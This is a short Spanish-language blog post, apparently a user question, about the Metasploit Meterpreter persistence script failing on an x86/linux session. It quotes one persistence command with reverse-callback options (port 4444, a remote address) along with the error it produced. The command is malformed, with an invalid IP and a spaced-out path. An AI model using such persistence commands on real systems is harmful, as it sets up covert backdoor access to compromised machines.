Blog

Problema de persistencia de Meterpreter

Estoy jugando con este tutorial y si intento este comando ejecutar persistencia -A -L / var / -X 30 -p 4444 -r 10.601.37 me dice ¡La versión x86 / linux de Meterpreter no es compatible con este script! y si defino -P con linux / meterpreter / reversetcp todavía dice lo mismo. ¿Estoy haciendo algo mal?

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba
Cerrar